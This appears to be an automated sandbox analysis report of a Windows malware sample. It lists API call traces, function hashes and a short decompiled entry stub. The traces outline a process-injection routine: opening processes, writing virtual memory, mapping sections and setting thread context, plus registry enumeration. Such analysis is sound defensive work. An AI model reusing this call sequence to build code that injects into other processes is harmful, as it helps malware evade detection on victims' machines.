    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:13FFE10E12298A4E8DC1EE7A0B003B93
Total matches:34
Initial Analysis Report:Open
Initial sample Analysis ID:58680
Initial sample SHA 256:75D846C690C188A3CC6A2E226FDD42AF8A1351B07FB56795106285178B0A0AA7
Initial sample name:sample.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
